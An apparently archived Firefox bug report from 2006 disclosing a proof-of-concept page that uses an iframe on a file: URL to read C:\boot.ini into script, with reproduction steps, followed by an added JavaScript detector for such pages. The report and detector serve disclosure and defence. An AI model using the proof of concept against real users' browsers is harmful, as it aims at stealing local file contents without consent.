Closed Bug 354059 Opened 18 years ago Closed 18 years ago

Directory listing and file content stealing via iframes.

Categories

(Firefox :: Security, defect)

defect
Not set
major

RESOLVED DUPLICATE of bug 230606

People

(Reporter: t3st3r, Unassigned)

Attachments

(1 file)

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7

I've detected iframe-based code which is capable of stealing either a directory listing or even the content of a given file. This is unfair.

Example tested by me:
(based on http://www.gnucitizen.org/blog/web-pages-from-hell)

<html>
<body>
<iframe src="file:///C:/boot.ini" onload="getContent(this)"></iframe>
<script>
  function getContent(iframe) {
    var content = '';
    if (iframe.contentDocument) {
      content = iframe.contentDocument.body.innerHTML; 
    } else if (iframe.contentWindow) {
      content = iframe.contentWindow.document.body.innerHTML;
    } else if (iframe.document) {
      content = iframe.document.body.innerHTML;
    }
    alert(content);
  }
</script>
</body>
</html>


Reproducible: Always

Steps to Reproduce:
1. You should have a C:\boot.ini file (which definitely means an NT-based OS here); you can use another file name, though.
2. Write the given code to something.html
3. Open this page in the browser
Result:
 Alert() messagebox appears with file content.
Actual Results:  
Directory listings and file data could be accessed by the browser without the user's consent. The browser can send private\confidential data without the user's consent.

Expected Results:  
Such actions surely should be denied by browser security checks. Otherwise the browser can act as a trojan horse\data thief.

All credits to http://www.gnucitizen.org/blog/web-pages-from-hell - I just rechecked whether this works in my Firefox. It does :(
Attached file testcase
I got a security error for 1.8.0.7, 1.8, 1.9 on winxp...

*** This bug has been marked as a duplicate of 230606 ***
Group: security
Status: UNCONFIRMED → RESOLVED
Closed: 18 years ago
Resolution: --- → DUPLICATE
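
Added example, not part of the bug report or of Mozilla's code: a heuristic JavaScript check for triaging saved HTML files that contain the pattern in the test case above, a frame pointing at a file: URL whose document is then read by script. The function names, the verdict labels and the sample strings are assumptions made for illustration.

```javascript
// Added example (not from the bug report): heuristic triage of saved HTML files.
// Flags markup that frames a file: URL and script that reads the frame's document.
// Regex-based, so markup built at runtime or entity-encoded URLs are not covered.
const FRAME_TAG = /<(iframe|frame|object|embed)\b[^>]*>/gi;
const URL_ATTR = /\b(?:src|data)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i;
const FRAME_READ = /\b(?:contentDocument|contentWindow)\b/;

// Return every frame-like tag whose URL attribute uses the file: scheme.
function findLocalFileFrames(html) {
  const findings = [];
  for (const m of html.matchAll(FRAME_TAG)) {
    const attr = URL_ATTR.exec(m[0]);
    if (!attr) continue;
    const url = (attr[1] || attr[2] || attr[3] || '').trim();
    if (/^file:/i.test(url)) {
      findings.push({ tag: m[1].toLowerCase(), url: url, offset: m.index });
    }
  }
  return findings;
}

// Classify a page: 'clean', 'frames-local-file', or 'reads-local-file'.
function assessPage(html) {
  const frames = findLocalFileFrames(html);
  const readsFrame = FRAME_READ.test(html);
  let verdict = 'clean';
  if (frames.length > 0) {
    verdict = readsFrame ? 'reads-local-file' : 'frames-local-file';
  }
  return { verdict: verdict, frames: frames, readsFrame: readsFrame };
}

// Constructed samples: the first mirrors the test case in this report.
const SAMPLES = {
  testcase: '<iframe src="file:///C:/boot.ini" onload="getContent(this)"></iframe>' +
            '<script>content = iframe.contentDocument.body.innerHTML;</script>',
  frameOnly: "<IFRAME SRC='FILE:///C:/notes.txt'></IFRAME>",
  remote: '<iframe src="https://example.com/widget"></iframe>' +
          '<script>var d = f.contentWindow;</script>',
};

for (const [name, html] of Object.entries(SAMPLES)) {
  console.log(name, assessPage(html).verdict);
}
```

A 'reads-local-file' verdict only means the page attempts the access; whether the browser allows it depends on the build, as the differing results in this report show.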